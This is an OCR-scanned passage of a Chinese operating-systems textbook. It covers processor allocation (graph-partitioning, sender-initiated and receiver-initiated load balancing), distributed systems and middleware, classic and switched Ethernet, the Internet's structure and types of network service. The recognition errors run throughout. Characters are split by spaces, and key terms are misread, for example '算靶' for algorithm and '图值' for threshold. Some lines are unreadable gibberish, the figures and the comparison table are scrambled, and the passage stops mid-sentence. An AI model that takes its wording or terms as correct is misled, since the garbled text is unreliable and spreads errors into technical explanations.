以 使 用 任何 本 地 调度 算 靶 ， 除 非 正 在 使 用 群 调度 。 不 过 ， 一 旦 一 个 进程 被 指定 给 了 某 个 节点 ， 就 不 再 有 
什么 可 控制 的 ， 因 此 ， 哪 个 进程 被 指定 给 哪个 节点 的 决策 是 很 重要 的 。 这 同 多 处 理 机 系统 相反 ， 在 多 处 
理 机 系统 中 所 有 的 进程 都 在 同一 个 存储 器 中 ， 可 以 随意 调度 到 任何 CPU 上 和 运行。 因此， 值得 考察 怎样 以 
有 效 的 方式 把 进程 分 配 到 各 个 节点 上 上。 从事 这 种 分 配 工作 的 算法 和 启发 式 方法 则 是 所 谓 的 处 理 器 分 配 算 
法 (processor allocation algorithm ) 。 

多 年 来 已 出 现 了 大 量 的 处 理 器 (节点 ) 分 配 算法 。 它 们 的 差别 是 分 别 有 各 自 的 前 提 和 目标 。 可 知 的 
进程 属性 包括 CPU 需求 、 存 储 器 使 用 以 及 与 每 个 其 他 进程 的 通信 量 等 。 可 能 的 目标 包括 最 小 化 由 于 缺少 
本 地 工作 而 浪费 的 CPU 周期 ， 最 小 化 总 的 通信 带宽 ， 以 及 确保 用 户 和 进程 公平 性 等 。 下 面 将 讨论 几 个 算 
法 ， 以 使 读者 了 解 各 种 可 能 的 情况 。 

1. 图 论 确定 算法 

有 一 类 被 广泛 研究 的 算法 用 于 下 面 这 样 一 个 系统 ， 该 系统 包含 已 知 CPU 和 存储 器 需求 的 进程 ， 以 及 
给 出 每 对 进程 之 间 平 均 流量 的 已 知 矩 了 泗 。 如 果 进 程 的 数量 大 于 CPU 的 数量 kx， 则 必须 把 若干 个 进程 分 配 
给 每 个 CPU。 其 想法 是 以 最 小 的 网 络 流量 完成 这 个 分 配 工作 。 

该 系统 可 以 用 一 个 带 权 图 表示 ， 每 个 顶点 是 一 个 进程 ， 而 每 个 弧 代 表 两 个 进程 之 间 的 消息 流 。 在 数 
学 上 ， 该 问题 就 简化 为 在 特定 的 限制 条 件 下 (如 每 个 子 图 对 整个 CPU 和 存储 器 的 需求 低 于 某 些 限制 )， 
寻找 一 个 将 图 分 割 (DE) 为 个 互 不 连接 的 子 图 的 方法 。 对 于 每 个 满足 限制 条 件 的 解决 方案 ， 完 全 在 
单个 子 图 内 的 弧 代 表 了 机 器 内 部 的 通信 ， 可 以 忽略 。 从 一 个 子 图 通 向 另 一 个 子 图 的 弧 代 表 网 络 通信 。 目 
标 是 找 出 可 以 使 网 络 流量 最 小 同时 满足 所 有 的 限制 条 件 的 分 割 方法 。 作 为 一 个 例子 ， 图 8-24 给 出 了 一 个 
有 9 个 进程 的 系统 ， 这 9 个 进程 是 进程 A 至 1， 每 个 弧 上 标 有 两 个 进程 之 间 的 平均 通信 和 负载 (例如 ， 以 Mbys 
为 单位 ) 。 

在 图 8-24a 中 ， 我 们 将 有 进程 A、E 和 G 的 图 划分 到 节点 1 上 ， 进 程 B、F 和 H 划 分 在 节点 2 上 ， 而 进程 
C、D 和 I 划分 在 节点 3 上 。 整 个 网 络 流量 是 被 切割 (虚线 ) 的 弧 上 的 流量 之 和 ， 即 30 个 单位 。 在 图 8-24b 
中 ， 有 一 种 不 同 的 划分 方法 ， 只 有 28 个 单位 的 网 络 流量 。 假 设 该 方法 满足 所 有 的 存储 器 和 CPU 的 限制 条 
件 ， 那 么 这 个 方法 就 是 一 个 更 好 的 选择 ， 因 为 它 需 要 较 少 的 通信 流量 。 

BUA, RANE SABA GRACE) AYRE (cluster)， 并 且 与 其 他 的 徐 有 较 少 的 交 
互 ( 乱 外 低 流 量 )。 讨 论 这 些 问题 的 最 早 的 论文 是 (Chow 和 Abraham，1982; Lo, 1984, Stone 和 
Bokhari, 1978) 等 。 


1 1 1 1 
节点 1 ! 节点 2 WR 节点 1 | 节点 2 上 节点 3 





图 8-24 将 9 个 进程 分 配 到 3 个 节点 上 的 两 种 方法 
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2. 发 送 者 发 起 的 分 布 式 启发 算法 


现在 看 一 些 分 布 式 算法 。 有 一 个 算法 是 这 样 的 ， 当 进程 创建 时 ， 它 就 运行 在 创建 它 的 节点 上 ， 除 非 
该 节点 过 载 了 。 过 载 节点 的 度量 可 能 涉及 太 多 的 进程 ， 过 大 的 工作 集 ， 或 者 其 他 度量 。 如 果 过 载 了 ， 该 
节点 随机 选择 另 一 个 节点 并 询问 它 的 负载 情况 (使 用 同样 的 度量 ) 。 如 果 被 探查 的 节点 负载 低 于 某 个 图 
值 ， 就 将 新 的 进程 送 到 该 节点 上 (Eager 等 人 ，1986)。 如 果 不 是 ， 则 选择 另 一 个 机 器 探查 。 探 查 工 作 并 
不 会 永远 进行 下 去 。 在 N 次 探查 之 内 ， 如 果 没 有 找到 合适 的 主机 ， 算 法 就 终止 ， 且 进程 继续 在 原 有 的 机 
器 上 运行 。 整 个 算法 的 思想 是 负载 较 重 的 节点 试图 电 掉 超额 的 工作 ， 如 图 8-25a 所 示 。 该 图 描述 了 发 送 
者 发 起 的 负载 平衡 。 





图 8-25 a) 过 载 的 节点 寻找 可 以 接收 进程 的 轻 载 节点 ，b) 一 个 空 节 点 寻找 工作 做 


Eager" A (1986) 构造 了 一 个 该 算法 的 分 析 排 队 模 型 (queueing model)。 使 用 这 个 模型 ， 所 建立 
的 算法 表现 良好 而 且 在 包括 不 同 的 装 值 、 传 输 成 本 以 及 探查 限定 等 大 范围 的 参数 内 工作 稳定 。 

但 是 ， 应 该 看 到 在 负载 重 的 条 件 下 ， 所 有 的 机 器 都 会 持续 地 对 其 他 机 器 进行 探查 ， 徒 劳 地 试图 找到 
一 台 愿 意 接收 更 多 工作 的 机 器 。 几 乎 没有 进程 能 够 被 卸载 ， 可 是 这 样 的 尝试 会 带 来 巨大 的 开销 。 

3. 接收 者 发 起 的 分 布 式 启发 算法 

上 面 讨论 的 算法 是 由 一 个 过 载 的 发 送 者 发 起 的 ， 它 的 一 个 互补 算法 是 由 一 个 轻 载 的 接收 者 发 起 的 ， 
如 图 8-25b 所 示 。 在 这 个 算法 中 ， 只 要 有 一 个 进程 结束 ， 系 统 就 检查 是 否 有 足够 的 工作 可 做 。 如 果 不 是 ， 
它 随机 选择 某 台 机 器 并 要 求 它 提供 工作 。 如 果 该 台 机 器 没有 可 提供 的 工作 ， 会 接着 询问 第 二 台 ， 然 后 是 
第 三 台 机 器 。 如 果 在 N 次 探查 之 后 ， 还 是 没有 找到 工作 ， 该 节点 暂时 停止 询问 ， 去 做 任何 已 经 安排 好 的 
工作 ， 而 在 下 一 个 进程 结束 之 后 机 器 会 再 次 进行 询问 。 如 果 没 有 可 做 的 工作 ， 机 器 就 开始 空间 。 在 经 过 
固定 的 时 间 间 隔 之 后 ， 它 又 开始 探查 。 

这 个 算法 的 优点 是 ， 在 关键 时 刻 它 不 会 对 系统 增加 额外 的 负担 。 发 送 者 发 起 的 算法 在 机 器 最 不 能 够 
容忍 时 一 一 此 时 系统 已 是 负载 相当 重 了 , 做 了 大 量 的 探查 工作 。 有 了 接收 者 发 起 算法 ， 当 系统 负载 很 重 时 ， 
一 台 机 器 处 于 非 充 分 工作 状态 的 机 会 是 很 小 的 。 但 是 ， 当 这 种 情形 确实 发 生 时 ， 它 就 会 较 容易 地 找到 可 承 
接 的 工作 。 当 然 ， 如 果 没 有 什么 工作 可 做 ， 接 收 者 发 起 算法 也 会 制造 出 大 量 的 探查 流量 ， 因 为 所 有 失业 的 
机 器 都 在 拼命 地 寻找 工作 。 不 过 ， 在 系统 轻 载 时 增加 系统 的 负载 要 远 远 好 于 在 系统 过 载 时 再 增加 负载 。 

把 这 两 种 算法 组 合 起 来 是 有 可 能 的 ， 当 机 器 工作 太 多 时 可 以 试图 人 印 掉 一 些 工 作 ， 而 在 工作 不 多 时 可 
以 尝试 得 到 一 些 工作 。 此 外 ， 机 器 也 许可 以 通过 保留 一 份 以 往 探查 的 历史 记录 (用 以 确定 是 否 有 机 器 经 
常 性 处 于 轻 载 或 过 载 状态 ) 来 对 随机 轮 询 的 方法 进行 改进 。 可 以 首先 尝试 这 些 机 器 中 的 某 一 台 ， 这 取决 
于 发 起 者 是 试图 邱 掉 工 作 还 是 获得 工作 。 


8.3 分 布 式 系统 


到 此 为 止 有 关 多 核 、 多 处 理 机 和 多 计算 机 的 讨论 就 结束 了 ， 现 在 应 该 转向 最 后 一 种 多 处 理 机 系统 ， 
即 分布 式 系统 (distributed system)。 这 些 系统 与 多 计算 机 类 似 ， 每 个 节点 都 有 自己 的 私有 存储 器 ， 整 个 
系统 中 没有 共享 的 物理 存储 器 。 但 是 ， 分 布 式 系统 与 多 计算 机 相 比 ， 耦 合 度 更 加 松散 。 


320 z8 # 


首先 ， 一 台 多 计算 机 的 每 个 节点 通常 有 CPU、RAM、 网 卡 ， 可 能 还 有 用 于 分 页 的 硬盘 。 与 之 相反 ， 
分 布 式 系统 中 的 每 个 节点 都 是 一 台 完 整 的 计算 机 ， 带 有 全 部 的 外 部 设备 。 其 次 ， 一 台 多 计算 机 的 所 有 节 
点 一 般 就 在 一 个 房间 里 ， 这 样 它 们 可 以 通过 专门 的 高 速 网 络 通信 ， 而 分 布 式 系统 中 的 节点 则 可 能 分 散在 
全 世界 范围 内 。 最 后 ， 一 台 多 计算 机 的 所 有 节点 运行 同样 的 操作 系统 ， 共 享 一 个 文件 系统 ， 并 处 在 一 个 
共同 的 管理 之 下 ， 而 一 个 分 布 式 系统 的 节点 可 以 运行 不 同 的 操作 系统 ， 每 个 节点 有 自己 的 文件 系统 ， 并 
且 处 在 不 同 的 管理 之 下 。 一 个 典型 的 多 计算 机 的 例子 如 一 个 公司 或 一 所 大 学 的 一 个 房间 中 用 于 诸如 药物 
建 模 等 工作 的 1024 个 节点 ， 而 一 个 典型 的 分 布 式 系统 包括 了 通过 Internet 松 散 协作 的 上 千 台 机 器 。 在 图 8-26 
中 ， 对 多 处 理 机 、 多 计算 机 和 分 布 式 系统 就 上 述 各 点 进行 了 比较 。 



































项 目 | 多 处 理 机 多 计算 机 | 分 布 式 系统 
节点 配置 CPU | _ CPU、RAM、 网 络 接口 完整 的 计算 机 
节点 外 设 全 部 共享 共享 exc.， 可 能 除了 磁盘 | 每 个 节点 全 套 外 设 
fin 同一 机 箱 同一 房间 可 能 全 球 
节点 间 通 信 共享 RAM 专用 互 连 传统 网 络 
操作 系统 一 个 ,共享 多 个 ， 相 同 可 能 都 不 相同 
文件 系统 一 个 ， 共享 一 个 ， 共享 每 个 节点 自 有 

| 管理 一 个 机 构 。 ”| 一 个 机 构 多 个 机 构 














图 8-26 三 类 多 CPU 系统 的 比较 


通过 这 个 表 可 以 清楚 地 看 到 ， 多 计算 机 处 于 中 间 位 置 。 于 是 一 个 有 趣 的 问题 就 是 :“ 多 计算 机 是 更 
像 多 处 理 机 还 是 更 像 分 布 式 系统 ? ”很 奇怪 ， 答 案 取决 于 你 的 角度 。 从 技术 角度 来 看 ， 多 处 理 机 有 共享 
存储 器 而 其 他 两 类 没有 。 这 个 差别 导致 了 不 同 的 程序 设计 模式 和 不 同 的 思考 方式 。 但 是 ， 从 应 用 角度 来 
看 ， 多 处 理 机 和 多 计算 机 都 不 过 是 在 机 房 中 的 大 设备 机 架 (rack) 罢了 ， 而 在 全 部 依靠 Internet 连 接 计 算 
机 的 分 布 式 系统 中 显然 通信 要 多 于 计算 ， 并 且 以 不 同 的 方式 使 用 着 。 

在 某 种 程度 上 ， 分 布 式 系统 中 计算 机 的 松散 耦合 既是 优点 又 是 缺点 。 它 之 所 以 是 优点 ， 是 因为 这 些 
计算 机 可 用 在 各 种 类 型 的 应 用 之 中 ， 但 它 也 是 缺点 ， 因 为 它 由 于 缺少 共同 的 底层 模型 而 使 得 这 些 应 用 程 
序 很 难 编程 实现 。 

典型 的 Internet 应 用 有 远程 计算 机 访问 (使 用 telnet、ssh 和 rlogin)、 远 程 信息 访问 (使 用 万 维 网 
(World Wide Web) 和 FTP， 即 文件 传输 协议 )、 人 际 通信 (使 用 e-mail 和 聊天 程序 ) 以 及 正在 浮现 的 许 
多 应 用 (例如 ， 电 子 商务 、 远 程 医疗 以 及 远程 教育 等 )。 所 有 这 些 应 用 带 来 的 问题 是 ， 每 个 应 用 都 得 重 
新 开发 。 例 如 ，e-mail、FTP 和 万 维 网 基本 上 都 是 将 文件 从 A 点 移动 到 另 一 个 点 B， 但 是 每 一 种 应 用 都 有 
自己 的 方式 从 事 这 项 工作 ， 完 全 按照 自己 的 命名 规则 、 传 输 协议 、 复 制 技术 以 及 其 他 等 。 尽 管 许 多 Web 
浏览 器 对 普通 用 户 隐 藏 了 这 些 差别 ， 但 是 底层 机 制 仍然 是 完全 不 同 的 。 在 用 户 界面 级 隐藏 这 些 差别 就 像 
有 一 个 人 在 一 家 提供 全 面 服务 的 旅行 社 的 Web 站 点 中 预订 了 从 纽约 到 旧金山 的 旅行 ， 后 来 发 现 她 所 购买 
的 只 不 过 是 一 张 飞机 票 、 一 张 火 车 票 或 者 一 张 汽车 票 而 已 。 

分 布 式 系统 添加 在 其 底层 网 络 上 的 是 一 些 通用 范 型 (模型 ) ， 它 们 提供 了 一 种 统一 的 方法 来 观察 整 
个 系统 。 分 布 式 系 统 想 要 做 的 是 ， 将 松散 连接 的 大 量 机 器 转化 为 基于 一 种 概念 的 一 致 系统 。 这 些 范 型 有 
的 比较 简单 ， 而 有 的 是 很 复杂 的 ， 但 是 其 思想 则 总 是 提供 某 些 东西 用 来 统一 整个 系统 。 

在 上 下 文 稍 有 差别 的 情形 下 ， 统 一 范例 的 一 个 简单 例子 可 以 在 UNIX 中 找到 。 在 UNIX 中 ， 所 有 的 
IO 设备 被 构造 成 像 文件 一 样 。 对 键盘 、 打 印 机 以 及 串 行 通信 线 等 都 使 用 相同 的 方式 和 相同 的 原 语 进行 
操作 ， 这 样 ， 与 保持 原 有 概念 上 的 差异 相 比 ， 对 它们 的 处 理 更 为 容易 。 

分 布 式 系 统 面 对 不 同 硬件 和 操作 系统 实现 某 种 统一 性 的 途径 是 ， 在 操作 系统 的 顶部 添加 一 层 软件 。 
这 层 软件 称 为 中 间 件 (middleware) ， 如 图 8-27 所 示 。 这 层 软件 提供 了 一 些 特定 的 数据 结构 和 操作 ， 从 而 
允许 散布 的 机 器 上 的 进程 和 用 户 用 一 致 的 方式 互 操作 。 

在 某 种 意义 上 ， 中 间 件 像 是 分 布 式 系统 的 操作 系统 。 这 就 是 为 什么 在 一 本 关于 操作 系统 的 书 中 讨论 
中 间 件 的 原因 。 不 过 另 一 方面 ， 中 间 件 又 不 是 真正 的 操作 系统 ， 所 以 我 们 对 中 间 件 有 关 的 讨论 不 会 过 于 
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详细 。 较 为 全 面 的 关于 分 布 式 系统 的 讨论 可 参见 教材 《分 布 式 系统 》(《Distributed Systems) ; 
` Tanenbaum 和 van Steen，2007) 。 在 本 章 余 下 的 部 分 ， 首 先 我 们 将 快速 考察 在 分 布 式 系统 (下层 的 计算 
机 网 络 ) 中 使 用 的 硬件 ， 然 后 介绍 其 通信 软件 (网 络 协议 ) ， 接 着 我 们 将 考虑 在 这 些 系统 中 的 各 种 范 型 。 


应 用 的 公共 基础 





图 8-27 在 分 布 式 系 统 中 中 间 件 的 地 位 


8.3.1 网 络 硬件 

分 布 式 系统 构建 在 计算 机 网 络 的 上 层 ， 所 以 有 必要 对 计算 机 网 络 这 个 主题 做 个 简要 的 介绍 。 网 络 主 
要 有 两 种 ， 覆 盖 一 座 建筑 物 或 一 个 校园 的 LAN (局 域 网 ，Local Area Networks) 和 可 用 于 城市 、 乡 村 甚 
至 世界 范围 的 WAN (广域网 ，Wide Area Network) 。 最 重要 的 LAN 类 型 是 以 太 网 (Ethernet), ， 所 以 我 们 
把 它 作 为 LAN 的 范例 来 考察 。 至 于 WAN 的 例子 ， 我们 将 考察 Internet， 尽 管 在 技术 上 Internet 不 是 一 个 网 
络 ， 而 是 上 千 个 分 离 网 络 的 联邦 。 但 是 ， 就 我 们 的 目标 而 言 ， 把 Internet 视 为 一 个 WAN 就 足够 了 。 

1. 以 太 网 

经 典 的 以 太 网 ， 在 IEEE802.3 标 准 中 有 具体 描述 ， 由 用 来 连接 若干 计算 机 的 同 轴 电 缆 组 成 。 这 些 电 
缆 之 所 以 称 为 以 太 网 (Ethernet)， 是 源 于 发 光 以 太 ， 人 们 曾经 认为 电磁 辐射 是 通过 以 太 传 播 的 。(19 世 
纪 英国 物理 学 家 James Clerk Maxwell 发 现 了 电磁 辐射 可 用 一 个 波动 方程 描述 ， 那 时 科学 家 们 假设 空中 必 
须 充满 了 某 些 以 太 介 质 ， 而 电磁 辐射 则 在 该 以 太 介质 中 传播 。 不 过 在 1887 年 著名 的 Michelson-Morley 实 
验 中 ， 科 学 家 们 并 未 能 探测 到 以 太 的 存在 ， 在 这 之 后 物理 学 家 们 才 意 识 到 电磁 辐射 可 以 在 真空 中 传播 。) 

在 以 太 网 的 非常 时 的 第 一 个 版 本 中 ， 计 算 机 与 外 了 半截 孔 的 电缆 通过 一 端 固定 在 这 些 孔 中 而 另 一 端 
与 计算 机 连接 的 电线 相连 接 。 它 们 被 称 为 插入 式 分 接头 (vampire tap), ， 如 图 8-28a 中 所 示 。 可 是 这 种 接 
头 很 难 接 正 确 ， 所 以 设 过 多 久 ， 就 换 用 更 合适 的 接头 了 。 无 论 怎样 ， 从 电气 上 来 看 ， 所 有 的 计算 机 都 被 
连接 起 来 ， 在 网 络 接口 卡 上 的 电缆 仿佛 是 被 焊 上 一 样 。 

许多 计算 机 连接 到 同一 根 电缆 上 ， 需 要 一 个 协议 来 防止 混乱 。 要 在 以 太 网 上 发 送 包 ， 计 算 机 首先 要 
监听 电缆 ， 看 看 是 否 有 其 他 的 计算 机 正在 进行 传输 。 如 果 没 有 ， 这 人 台 计 算 机 便 开 始 传送 一 个 包 ， 其 中 有 
一 个 短 包 头 ， 随 后 是 0 到 1500 字 节 的 有 效 信息 载荷 (Payload) 。 如 果 电 缆 正 在 使 用 中 ， 计 算 机 只 是 等 待 
直到 当前 的 传输 结束 ， 接 着 该 台 计 算 机 开始 发 送 。 

如 果 两 台 计算 机 同时 开始 发 送 ， 就 会 导致 冲突 发 生 ， 两 台 机 器 都 做 检测 。 两 机 都 用 中 断 其 传输 来 响 
应 检测 到 的 碰撞 ， 然 后 在 等 待 一 个 从 0 到 7 微 秒 的 随机 时 间 段 之 后 ， 再 重新 开始 。 如 果 再 一 次 冲突 发 生 ， 
所 有 碰撞 的 计算 机 进入 0 到 27 微 秒 的 随机 等 待 。 然 后 再 尝试 。 在 每 个 后 续 的 冲突 中 ， 最 大 等 待 间 隔 加 倍 ， 
用 以 减少 更 多 碰撞 的 机 会 。 这 个 算法 称 为 二 进 制 指数 回 退 算法 (binary exponential backoff) 。 在 前 面 有 
关 减 少 锁 的 轮 询 开 销 中 ， 我 们 曾 介 绍 过 这 种 算法 。 

以 太 网 有 其 最 大 电缆 长 度 限制 ， 以 及 可 连接 的 最 多 的 计算 机 台数 限制 。 要 想 超 过 其 中 一 个 的 限制 ， 
就 要 在 一 座 大 建筑 物 或 校园 中 连接 多 个 以 太 网 ， 然 后 用 一 种 称 为 桥接 器 (bridge) 的 设备 把 这 些 以 太 网 
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连接 起 来 。 桥 接 器 允许 信息 从 一 个 以 太 网 传递 到 另 一 个 以 太 网 ， 而 源 在 桥接 器 的 一 边 ， 目 的 地 在 桥接 器 
的 另 一 边 。 


计算 机 


以 太 网 





a) 
图 8-28 a) 经 典 以 太 网 ，b) 交换 式 以 太 网 


为 了 避免 碰撞 问题 ， 现 代 以 太 网 使 用 交换 机 (switch) ， 如 图 8-28b 所 示 。 每 个 交换 机 有 若干 个 端口 ， 
一 个 端口 用 于 连接 一 台 计 算 机 、 一 个 以 太 网 或 另 一 个 交换 机 。 当 一 个 包 成 功 地 避 开 所 有 的 碰撞 并 到 达 交 
换 机 时 ， 它 被 缓存 在 交换 机 中 并 送 往 另 一 个 通 往 目 的 地 机 器 的 端口 。 若 能 忍受 较 大 的 交换 机 成 本 ， 可 以 
使 每 台 机 器 都 拥有 自己 的 端口 ， 从 而 消除 掉 所 有 的 碰撞 。 作 为 一 种 妥协 方案 ， 在 每 个 端口 上 连接 少量 的 
计算 机 还 是 有 可 能 的 。 在 图 8-28b 中 ， 一 个 经 典 的 由 多 个 计算 机 组 成 以 太 网 连接 到 交换 机 的 一 个 端口 中 ， 
这 个 以 太 网 中 的 计算 机 通过 插入 式 分 接头 连接 在 电缆 上 。 

2. 因特网 

Internet 由 ARPANET (美国 国防 部 高 级 研究 项 目 署 资助 的 一 个 实验 性 的 包 交 换 网 络 ) 演化 而 来 。 它 
自 1969 年 12 月 起 开始 运行 ， 由 三 台 在 加 州 的 计算 机 和 一 台 在 犹他 州 的 计算 机 组 成 。 当 时 正 值 冷战 的 顶峰 
时 期 ， 它 被 设计 为 一 个 高 度 容错 的 网 络 ， 在 核弹 直接 击 中 网 络 的 多 个 部 分 时 ， 该 网 络 将 能 够 通过 自动 改 
换 已 死亡 机 器 周边 的 路 由 ， 继 续 保 持 军事 通信 的 中 继 。 

ARPANET 在 20 世 纪 70 年 代 迅 速 地 成 长 ， 结 果 拥 有 了 上 百 台 计 算 机 。 接 着 ， 一 个 包 无 线 网 络 、 一 个 卫 
星 网 络 以 及 成 千 的 以 太 网 都 联 在 了 该 网 络 上 ， 从 而 变 成 为 网 络 的 联邦 ， 即 我 们 今天 所 看 到 的 Internet。 

Internet 包 括 了 两 类 计算 机 ， 主 机 和 路 由 器 。 主 机 (host) 有 PC、 笔 记 本 计算 机 、 掌 上 电脑 ， 服 务 
器 、 大 型 计算 机 以 及 其 他 那些 个 人 或 公司 所 有 且 希 望 与 Internet 连 接 的 计算 机 。 路 由 器 (router) 是 专用 
的 交换 计算 机 ， 它 在 许多 进 线 中 的 一 条 线 上 接收 进来 的 包 ， 并 在 许多 个 出 口 线 中 的 一 条 线 上 按照 其 路 径 
发 送 包 。 路 由 器 类 似 于 图 8-28b 中 的 交换 机 ， 但 是 路 由 器 与 这 种 交换 机 也 是 有 差别 的 ， 这 些 差别 就 不 在 
这 里 讨论 了 。 在 大 型 网 络 中 ， 路 由 器 互相 连接 ， 每 台 路 由 器 都 通过 线 缆 或 光缆 连接 到 其 他 的 路 由 器 或 主 
机 上 。 电 话 公 司 和 互联 网 服务 提供 商 (Internet Service Providers, ISP) 为 其 客户 运行 大 型 的 全 国 性 或 
全 球 性 路 由 器 网 络 。 

图 8-29 展 示 了 Internet 的 一 部 分 。 在 图 的 顶部 是 其 主干 网 (backbone) 之 一 ， 通 常 由 主干 网 操作 员 管 
理 。 它 包括 了 大 量 通 过 宽带 光纤 连接 的 路 由 器 ， 同 时 连接 着 其 他 (竞争 ) 电话 公司 运行 管理 的 主干 网 。 
除了 电话 公司 为 维护 和 测试 所 需 运 行 的 机 器 之 外 ， 通 常 没有 主机 直接 联 在 主干 网 上 。 

地 区 网 络 和 ISP 的 路 由 器 通过 中 等 速度 的 光纤 连接 到 主干 网 上 。 依 次 ， 每 个 配备 路 由 器 的 公司 以 太 
网 连接 到 地 区 网 络 的 路 由 器 上 。 而 ISP 的 路 由 器 则 被 连接 到 供 ISP 客 户 们 使 用 的 调制 解 调 器 汇集 器 (bank) 
上 。 按 照 这 种 方式 ， 在 Internet 上 的 每 台 主 机 至 少 拥有 通 往 其 他 主机 的 一 条 路 径 ， 而 且 每 台 经 常 拥有 多 条 
通 往 其 他 主机 的 路 径 。 

在 Internet 上 的 所 有 通信 都 以 包 (packet) 的 形式 传送 。 每 个 包 在 其 内 部 携带 着 目的 地 的 地 址 ， 而 这 
个 地 址 是 供 路 由 器 使 用 的 。 当 一 个 包 来 到 某 个 路 由 器 时 ， 该 路 由 器 抽取 目的 地 地 址 并 在 一 个 表格 (部 分 ) 
中 进行 查询 ， 以 找 出 用 哪 根 出 口 线 发 送 该 包 以 及 发 送 到 哪个 路 由 器 。 这 个 过 程 不 断 重复 ， 直 到 这 个 包 到 
达 目 的 主机 。 路 由 表 是 高 度 动态 的 ， 并 且 随 着 路 由 器 和 链 路 的 损坏 、 恢 复 以 及 通信 条 件 的 变化 在 连续 不 
断 地 更 新 。 多 年 来 ， 路 由 算法 得 到 了 深入 的 研究 和 修改 。 
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图 8-29 Internet 的 一 部 分 


8.3.2 网 络 服务 和 协议 

所 有 的 计算 机 网 络 都 为 其 用 户 (主机 和 进程 ) 提供 一 定 的 服务 ， 这 种 服务 通过 某 些 关于 合法 消息 交 
换 的 规则 加 以 实现 。 下 面 将 简要 地 叙述 这 些 内容 。 

1. 网 络 服务 

计算 机 网 络 为 使 用 网 络 的 主机 和 进程 提供 服务 。 面 向 连接 的 服务 是 对 电话 系统 的 一 种 模仿 。 比 如 ， 
若 要 同 某 人 谈话 ， 则 要 先 拿 起 听筒 ， 拨 出 号 码 ， 说 话 ， 然 后 挂 掉 。 类 似 地 ， 要 使 用 面向 连接 的 服务 ， 服 
务 用 户 要 先 建立 一 个 连接 ， 使 用 该 连接 ， 然 后 释放 该 连接 。 一 个 连接 的 基本 作用 则 像 一 根 管道 :发送 者 
在 一 端 把 物品 (信息 位 ) 推 和 管道， 而 接收 者 则 按照 相同 的 顺序 在 管道 的 另 一 端 取出 它们 。 

相反 ， 无 连接 服务 则 是 对 邮政 系统 的 一 种 模仿 。 每 个 消息 (信件 ) 携带 了 完整 的 目的 地 地 址 ， 与 所 
有 其 他 消息 相 独 立 ， 每 个 消息 有 自己 的 路 径 通过 系统 。 通 常 ， 当 两 个 消息 被 送 往 同一 个 目的 地 时 ， 第 一 
个 发 送 的 消息 会 首先 到 达 。 但 是 ， 有 可 能 第 一 个 发 送 的 消息 会 被 延误 ， 这 样 第 二 个 消息 会 首先 到 达 。 而 
对 于 面向 连接 的 服务 而 言 ， 这 是 不 可 能 发 生 的 。 

每 种 服务 可 以 用 服务 质量 (quality of service) 表征 。 有 些 服务 就 其 从 来 不 丢失 数据 而 言 是 可 靠 的 。 
一 般 来 说 ， 可 靠 的 服务 是 用 以 下 方式 实现 的 : 接收 者 发 回 一 个 特别 的 确认 包 (acknowledgement packet) , 
确认 每 个 收 到 的 消息 ， 这 样 发 送 者 就 确信 消息 到 达 了 。 不 过 确认 的 过 程 引入 了 过 载 和 延迟 的 问题 ， 检 查 
包 的 丢失 是 必要 的 ， 但 是 这 样 确实 减缓 了 传送 的 速度 。 

一 种 适合 可 靠 的、 面向 连接 服务 的 典型 场景 是 文件 传送 。 文 件 的 所 有 者 希望 确保 所 有 的 信息 位 都 是 
正确 的 ， 并 且 按照 以 其 所 发 送 的 顺序 到 达 。 几 乎 没有 哪个 文件 发 送 客户 会 愿意 接受 偶尔 会 弄 乱 或 丢失 一 
些 位 的 文件 传送 服务 ， 即 使 其 发 送 速度 更 快 。 

可 靠 的 、 面 向 连接 的 服务 有 两 种 很 轻微 变种 (minor variant); 消息 序列 和 字 节 流 。 在 前 者 的 服务 中 ， 
保留 着 消息 的 边界 。 当 两 个 1KB 的 消息 发 送 时 ， 它 们 以 两 个 有 区 别 的 1KB 的 消息 形式 到 达 ， 决 不 会 成 为 
一 个 2KB 的 消息 。 在 后 者 的 服务 中 ， 连 接 只 是 形成 一 个 字 节 流 ， 不 存在 消息 的 边界 。 当 2K 字 节 到 达 接 收 
者 时 ,没有 办 法 分 辨 出 所 发 送 的 是 一 个 2KB 消 息 、 两 个 1KB 消 息 还 是 2048 个 单字 节 的 消息 或 者 其 他 消息 。 
如 果 以 分 离 的 消息 形式 通过 网 络 把 一 本 书 的 页 面 发 送 到 一 台 照 排 机 上 ， 在 这 种 情形 下 也 许 保留 消息 的 边 
界 是 重要 的 。 而 另 一 方面 ， 在 通过 一 个 终端 登录 进入 某 个 远程 服务 器 系统 时 ， 所 需要 的 也 只 是 从 该 终端 
到 计算 机 的 字 节 流 。 这 里 的 消息 没有 边界 。 

对 某 些 应 用 而 言 ， 由 确认 所 引入 的 时 延 是 不 可 接受 的 。 一 个 应 用 的 例子 是 数字 化 的 语音 通信 。 对 电 
话 用 户 而 言 ， 他 们 宁可 时 而 听 到 一 点 噪音 或 一 个 被 看 曲 的 词 ， 也 不 会 愿意 为 了 确认 而 接受 时 延 。 
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并 不 是 所 有 的 应 用 都 需要 连接 。 例 如 ， 在 测试 网 络 时 ， 所 需要 的 只 是 一 种 发 送 单个 包 的 方法 ， 其 中 
的 这 个 包 具 备 高 可 达到 率 但 不 保证 一 定 可 达 。 不 可 靠 的 (意味 着 没有 确认 ) 无 连接 服务 ， 常 常 称 作 数据 
报 服务 (datagram service) ， 它 模拟 了 电报 服务 ， 这 种 服务 也 不 为 发 送 者 提供 回 送 确认 的 服务 。 

在 其 他 的 情形 下 ， 不 用 建立 连接 就 可 发 送 短 消 息 的 便利 是 受到 欢迎 的 ， 但 是 可 靠 性 仍然 是 重要 的 。 
可 以 把 确认 数据 报 服务 (acknowledged datagram service) 提供 给 这 些 应 用 使 用 。 它 类 似 于 寄 送 一 封 挂 号 


信 并 且 要 求 得 到 一 个 返回 收据 。 当 收据 回 送 














到 之 后 ， 发 送 者 就 可 以 绝对 确信 ， 该 信 已 被 






送 到 所 希望 的 地 方 且 没 有 在 路 上 丢失 。 
还 有 一 种 服务 是 请 求 - 应 答 服务 连接 
(request-reply service) 。 在 这 种 服务 中 ， 发 数字 化 语音 
这 者 传送 一 份 包含 一 个 请 求 的 数据 报 ， 应 答 天 | a | | 人 | 
ee > 给 Dh] — | 确认 数据 报 O 注册 邮件 | 
eat tesa 


询问 维吾尔 语 在 什么 地 方 被 使 用 的 请 求 就 属 
于 这 种 类 型 。 在 客户 机 一 服务 器 模式 的 通信 图 8-30 六 种 不 同类 型 的 网 络 服务 
实现 中 常常 采用 请 求 - 应 答 : 客户 机 发 出 一 
